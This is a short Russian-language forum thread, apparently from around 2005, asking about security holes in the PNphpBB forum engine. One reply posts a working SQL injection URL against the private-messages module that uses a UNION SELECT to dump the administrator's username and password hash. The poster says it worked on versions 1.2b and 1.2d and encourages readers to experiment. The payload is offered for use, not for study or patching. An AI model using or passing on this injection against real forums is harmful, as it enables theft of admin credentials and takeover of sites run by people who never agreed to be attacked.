Вопрос по уязвимостям в PNphpBB (c) 2005

Кто-нибудь знает уязвимости этого движка форума?

 

кто-то знает... но скрывает =)
на самом деле хз.. даж на секурлаб этого нет... =((

 

Тот же phpBB, только для Post Nuke...Лень матушка, вот она где !

Code:

http://www.example.com/index.php?name=PNphpBB2&file=privmsg&folder=savebox&mode=read&p=99&pm_sql_user=AND%20pm.privmsgs_type=-
99%20UNION%20SELECT%20pn_uname,pn_pass,pn_pass,pn_pass,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20nuke_users%20where%20pn_uid=2/*

Показывает Хэш админа...ЭКСПЕРЕМЕНТИРУЙ...Если только СекАпдейт не стоит...у меня прокатывало на версиях 1.2(b и d)
З.Ы. СекЛаб не всегда решает...лично я по испанским Секам загоняюсь...много интересного пишут, хоть и не всегда понятно \=)
З.З.Ы.
Ну, а кому косяк тратить деньги на Интернет прошу на http://sourceforge.net/project/showfiles.php?group_id=76994 --->>>Эксперементируйте на local'e.